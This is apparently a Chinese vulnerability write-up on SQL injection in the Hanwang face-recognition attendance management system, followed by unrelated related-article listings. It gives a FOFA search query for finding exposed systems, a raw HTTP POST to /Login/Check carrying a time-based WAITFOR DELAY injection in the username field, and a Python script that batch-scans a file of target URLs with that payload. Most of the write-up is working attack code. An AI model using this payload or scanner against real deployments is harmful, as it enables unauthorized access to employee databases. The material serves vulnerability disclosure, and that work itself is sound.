汉王人脸考勤管理系统

简介: 汉王人脸考勤管理系统

漏洞简介


 汉王考勤管理系统简化版是是汉王人脸通考勤机的配套软件,满足客户的日常基本使用需要。汉王考勤管理系统第一次使用,需要完成一些例如服务器设置、员工信息、考勤规则、单位班次及员工排班等基本设置。该软件存在SQL注入,可获取数据库敏感信息。


FOFA语句


"汉王人脸考勤管理系统"


影响范围

汉王人脸考勤管理系统


漏洞复现


在登录框处抓包验证


poc


POST /Login/Check HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 50
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=d3bcakylkgolfzy3ftefkcqb
Connection: close
strName=admin';WAITFOR DELAY '0:0:5'--&strPwd=dasd


如果返回ok,说明存在SQL注入

640.png

python脚本


import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
def lemonlove7():
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file x.txt')
    print('FOFA:"汉王人脸考勤管理系统"')
    print('lemonlove7')
if len(sys.argv)==1:
    lemonlove7()
    sys.exit()
p = argparse.ArgumentParser(description='lemonlove7')
p.add_argument('-u','--url',help='输入url',default='')
p.add_argument('-f','--file',help='输入文件',default='')
a = p.parse_args()
url = a.url
file = a.file
headers= {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Cookie':'ASP.NET_SessionId=d3bcakylkgolfzy3ftefkcqb'
}
data="strName=admin';WAITFOR DELAY '0:0:5'--&strPwd=dasd"
if url != '':
    furl = url
    try:
        url =furl+'/Login/Check/'
        r= requests.post(url=url,headers=headers,data=data,timeout=10,verify=False)
        if r.status_code == 200 and 'ok' in r.text:
            print(furl+'存在sql注入')
        else:
            print(furl+'不存在sql注入')
    except Exception as e:
        print(furl+'不存在sql注入')
if file !='':
    text =file
    f = open(text,'r+')
    for i in f.readlines():
        url = i.strip()
        if url.startswith('http:') != 1 and url.startswith('https:') != 1:
            url = 'http://' + url
        url1 = url
        url2=url
        try:
            url1 = url+'/Login/Check/'
            r =requests.post(url=url1,headers=headers,data=data,timeout = 10,verify=False)
            if r.status_code==200 and 'ok' in r.text:
                print(url2+'存在sql注入')
            else:
                print(url2+'不存在sql注入')
        except Exception as e:
            print(url2+'不存在sql注入')


运行效果如下:

640.png




相关文章
|
机器学习/深度学习 自然语言处理 安全
智慧医院智能导诊系统源码
智慧导诊系统通过与医院HIS系统结合,还可实现整个就诊流程指引服务。患者只需要关注医院微信公众号,即可享受从挂号,缴费,体检,住院等就诊一系列的便民服务。
152 0
|
7月前
|
人工智能 监控 JavaScript
智慧产科管理系统源码,产科专科电子病历系统
【医院产科信息化系统】采用Java+Vue&ElementUI+MySQL技术,实现从前端到后端的分离。系统覆盖孕产妇全周期保健,包括建档、产检、分娩、康复等,打造专科电子病历。通过智慧功能如自助建档、高危孕产妇五色管理、AI辅助诊断、移动产检服务和智能产房,优化管理流程,提升孕产妇体验。自动化的报表生成减轻医护人员工作负担,确保信息高效流转和安全性。集成HIS,支持电子病历互通,实现产科服务全面信息化。
智慧产科管理系统源码,产科专科电子病历系统
|
9月前
|
人工智能 监控 数据可视化
智慧工地云平台源码支持人脸识别考勤 支持多工地
智慧工地是指利用云计算、大数据、物联网、移动互联网、人工智能等技术手段,为建筑施工现场提供智能硬件及物联网平台的解决方案,以实现建筑工地的实时化、可视化、多元化、智慧化和便捷化。
105 3
|
9月前
|
数据采集 小程序 数据管理
智慧校园智能电子班牌系统源码
智慧校园系统是利用物联网和云计算,强调对教学、科研、校园生活和管理的数据采集、智能处理、为管理者和各个角色按需提供智能化的数据分析、教学、学习的智能化服务环境。它包含“智慧环境、智慧学习、智慧服务、智慧管理”等层面的内容。
111 0
|
Java 关系型数据库 MySQL
基于Javaweb实现的人脸识别考勤系统
本系统基于Javaweb技术实现项目开发,使用Jsp进行系统界面开发,Servlet进行请求和响应的处理,Jdbc作为数据库开发技术,根据业务流程对系统进行模块功能点的划分,遵循软件工程思想,实现用户登录、机构管理、用户管理、节假日管理、考勤管理等功能。
403 0
基于Javaweb实现的人脸识别考勤系统
|
算法 计算机视觉 Python
基于人脸识别算法的考勤系统
基于人脸识别算法的考勤系统
150 0
|
人工智能 安全 数据挖掘
智慧校园云平台电子班牌人脸识别系统源码
源码开发环境:Java+springboot+vue+element-ui+mysql 智慧校园系统定位于中小学教育学校,侧重实际应用,讲究实际,突出加强校园安全监管,德育文化建设和家校互联,将信息技术与教育管理实现融合创新,利用智能身份感知、大数据、云服务技术开展对校园管理安全、文化和活动的信息收集、分析、判断,打造安全无缝化、沟通直观化、德育特色化、流程规范化的信息化校园。
191 0
智慧校园云平台电子班牌人脸识别系统源码
|
设计模式 Java 关系型数据库
基于Javaweb实现的人脸识别+GPS定位考勤系统
基于Javaweb实现的人脸识别+GPS定位考勤系统
675 0
基于Javaweb实现的人脸识别+GPS定位考勤系统
|
缓存 前端开发 NoSQL
人脸识别技术实现快递代取管理系统
人脸识别技术实现快递代取管理系统
170 0
人脸识别技术实现快递代取管理系统